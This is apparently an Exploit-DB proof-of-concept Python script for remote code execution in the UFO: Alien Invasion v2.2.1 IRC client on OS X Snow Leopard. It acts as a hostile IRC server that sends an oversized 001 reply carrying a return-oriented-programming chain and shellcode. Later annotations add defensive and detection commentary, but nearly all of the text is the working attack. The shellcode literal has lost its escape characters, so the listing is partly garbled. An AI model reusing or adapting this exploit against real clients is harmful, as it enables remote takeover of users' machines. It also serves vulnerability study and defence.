
# Title : UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution - OSX Snow Leopard (ROP)
# Published : 2010-07-08
# Author : d1dn0t


#!/usr/bin/python

# UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution - MacOSX
# OS X Snow Leopard: d1dn0t
# OS X Leopard: dookie
# Windows PoC: Jason Geffner http://www.exploit-db.com/exploits/14013

import sys, socket, struct

# Absolute addresses used by the ROP chain below. They are constants, so the
# chain only works if the image they belong to is always loaded at the same
# base; randomising that base (library/ASLR randomisation) is the mitigation
# that invalidates every gadget address in this file at once.
# NOTE(review): the listing does not say which library these resolve into.
WRITEABLE = 0x8fe66448  # writable scratch address; destination for the strcpy call below
STRCPY=0x8fe2db10       # address the chain calls as strcpy (per the "strcpy call" section)

# Payload bytes appended after the ROP chain (see `sploit` below).
# As reproduced on this page the literal has lost its backslash escapes, so
# each "xNN" is plain ASCII text rather than the intended byte value; what the
# payload does cannot be determined from this listing, and nothing here is
# decoded or disassembled. The only grounded observation is its shape: twelve
# lines of fifteen byte values, preceded in `sploit` by a short 0x90 sled.
shellcode = ("xdbxc3xd9x74x24xf4xbbxf3xbdx8dx7cx33xc9x5dxb1"
"x27x31x5dx18x03x5dx18x83xc5xf7x5fx78x4dx37x06"
"xd3xeexe7x79x84xbcxb7x1bxe9xc1xb8x59x8fxc1xc6"
"x5dxf9x04x94x0fxabxe0x18xb2x5axadx91x51x36x5d"
"xf2xc3x95xedx9cx26x99x7cx3bxebxccxd2x73x61x3c"
"x52x01x28xecx01xb3x86xa0xb8xf6xa7xb3x90x81x6f"
"x02xc2x12x84x64xb7x47x0cx34x87x3dx7fx3ax95x82"
"xfcxc0x59x71xf2x06x9ex29xa4x38x4ex79x7fx74xee"
"xe9x10xbaxc2x7cx18x73x5exb3x9axf0xa5x4bxefxe1"
"x68x8bx5fx66xa4x24x13x1exd2x15xb1xb7x4cxe0xd6"
"x18xc1xa1x48x29xdax88xe9x78xddx42x63x99x8dx32"
"x20x0ex7ex02xc1x63xfex53x0ex2bxafxd3x43x4cx45")

# ==================== ROP chain ====================
# A return-oriented chain of fixed gadget addresses, packed little-endian
# 32-bit. The target consumes these words in exactly this order off its
# stack, so the statements below are order-dependent and must not be
# reordered or regrouped. The author's per-line comments name the
# instruction sequence each address is expected to resolve to; none of that
# can be verified from this listing.
# Defender's reading: two properties of the target make this chain viable,
# and either one removed breaks it -- (1) the gadget and WRITEABLE addresses
# are compile-time constants, so a randomised image base leaves every entry
# pointing at the wrong bytes; (2) per the author's comment on the
# "Move execution to where we moved our shell" entry, control is transferred
# into the WRITEABLE region after strcpy fills it, which requires that region
# to be executable (a non-executable data mapping would fault there).
# ==================== Put stack pointer into EAX/EDX ==================== 
ROP = 	struct.pack('<I',0x8fe2b3d4)        # POP - RET Insturction - Pop's over the writeable value below
ROP += 	struct.pack('<I',WRITEABLE)					# Required Writeable address here for exploit to work
ROP += 	struct.pack('<I',0x8fe2fb63)				# pop eax # ret
ROP += 	struct.pack('<I',WRITEABLE)					# Pop writeable address into eax for instructions below
ROP += 	struct.pack('<I',0x8fe2fb58)				# push esp # and al,0x4 # mov [eax+0x28],edx # mov edx,[esp] # mov [eax],edx # pop eax # ret 

# ==================== Jump Over Parameters below ==================== 
ROP += 	struct.pack('<I',0xffff1d6b)				# add esp,byte +0x1c # pop ebp # ret

# ==================== strcpy call ==================== 
ROP += 	struct.pack('<I',STRCPY)						# use strcpy to copy shellcode from stack to heap
ROP += 	struct.pack('<I',0x8fe2dfd1)				# POP - POP - RET over strcpy params
ROP += 	struct.pack('<I',WRITEABLE)					# Dst Param for strcpy
ROP += 	'EEEE'															# Src Param for strcpy (placeholder; overwritten by the "Copy parameter to placeholder" step below)
ROP += 	struct.pack('<I',WRITEABLE)					# Move execution to where we moved our shell
ROP += 	'C'*12															# Padding 

# ==================== Craft Parameter 2  ==================== 

# Need to inc EAX or EDX to point to shell code

# Store  0x40 in ECX
ROP += 	struct.pack('<I',0x8fe2dae4)					# mov ecx,[esp+0x4] # add eax,edx # sub eax,ecx # ret  
ROP += 	struct.pack('<I',0x8fe2b3d4) 	       		    # POP - RET Insturction - Pop's over the value below
ROP += 	struct.pack('<I',0xffffffff)					# Value to store in ecx
ROP += 	struct.pack('<I',0x8fe0c0c7)					# inc ecx # xor al,0xc9
ROP += 	struct.pack('<I',0x8fe0c0c7)					# inc ecx # xor al,0xc9
ROP += 	struct.pack('<I',0x8fe24b3c)			 		# add ecx,ecx # ret
ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret
ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret
ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret

# Replace stack pointer back into eax as it was trashed
ROP += 	struct.pack('<I',0x8fe2c71d)					# mov eax,edx # ret

# Add offset to paramter 
ROP += 	struct.pack('<I',0x8fe2def4)					# add eax,ecx # ret

# Swap over so we can work on fresh copy of saved ESP
ROP += 	struct.pack('<I',0x8fe0e32d)					# xchg eax,edx

# Double ECX a few more times to point to our nop sled/shell code
ROP += 	struct.pack('<I',0x8fe0c0c7)					# inc ecx # xor al,0xc9
ROP += 	struct.pack('<I',0x8fe0c0c7)					# inc ecx # xor al,0xc9
ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret
ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret
ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret

# Add offset to shellcode 
ROP += 	struct.pack('<I',0x8fe2def4)					# add eax,ecx # ret

# Swap back
ROP += 	struct.pack('<I',0x8fe0e32d)					# xchg eax,edx

# Copy parameter to placeholder
ROP += 	struct.pack('<I',0x8fe2fb61)					# mov [eax],edx # pop eax # ret
ROP += 	'G'*4																	# junk

# ==================== Call strcpy function ==================== 

# Set our Stack pointer back to original value 
ROP += 	struct.pack('<I',0x8fe0e32d)					# xchg eax,edx
ROP += 	struct.pack('<I',0x8fe2daea)					# sub eax,ecx # ret

# Return execution to our strdup call above
# NOTE(review): the author says "strdup" here but the entry above is labelled strcpy -- same call, inconsistent naming.
ROP += 	struct.pack('<I',0x8fe0b1c2)					# xchg eax,ebp # inc ebp # ret 
ROP += 	struct.pack('<I',0x8fe2b6a5)					# dec ebp # ret
ROP += 	struct.pack('<I',0xffff01f3)					# mov esp,ebp # pop ebp # ret
ROP += 	'G'*4																	# junk

# ==================== Call Exploit code from heap ==================== 


# Wire payload: a single IRC numeric reply line. "001" is RPL_WELCOME, the
# first line a server sends after registration; here its trailing parameter
# is 528 copies of a filler byte, then the ROP chain, a 10-byte sled, the
# payload, and CRLF. The "x41" / "x90" / "x0dx0a" literals carry the same
# lost-backslash extraction damage as the `shellcode` literal above.
# Detection angle: a legitimate 001 reply is a short welcome sentence; a 001
# whose trailing parameter runs to hundreds of bytes and contains
# non-printable bytes is the anomaly to alert on at an IRC proxy or IDS.
# The filler length (528) is what the author found reaches the saved
# return address in this client build -- inferred from the layout, not
# stated on the page.
sploit = "001 :"
sploit += "x41" * 528
sploit += ROP
sploit += 'x90' * 10
sploit += shellcode
sploit += "x0dx0a"

# Delivery: this script plays the *server* side of IRC -- it binds TCP 6667,
# waits for one client, and sends the crafted line once on accept. So the
# exposure is a vulnerable client connecting to a hostile or compromised
# server, not an inbound attack on the user's machine; egress filtering of
# IRC to untrusted hosts and keeping the client patched are the controls.
# This is Python 2 code (print statement on the addr line; str concatenation
# with struct.pack output in `sploit`); it does not run under Python 3 as-is.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 6667))
s.listen(1)
print ("[*] Listening on port 6667.")
print ("[*] Have someone connect to you.")
print ("[*] Type [control]-c to exit.")
conn, addr = s.accept()
print '[*] Received connection from: ', addr

conn.send(sploit)
# NOTE(review): `conn.close` is referenced, not called (no parentheses), so
# the connection is never closed explicitly; the listening socket `s` is
# likewise left open until interpreter exit.
conn.close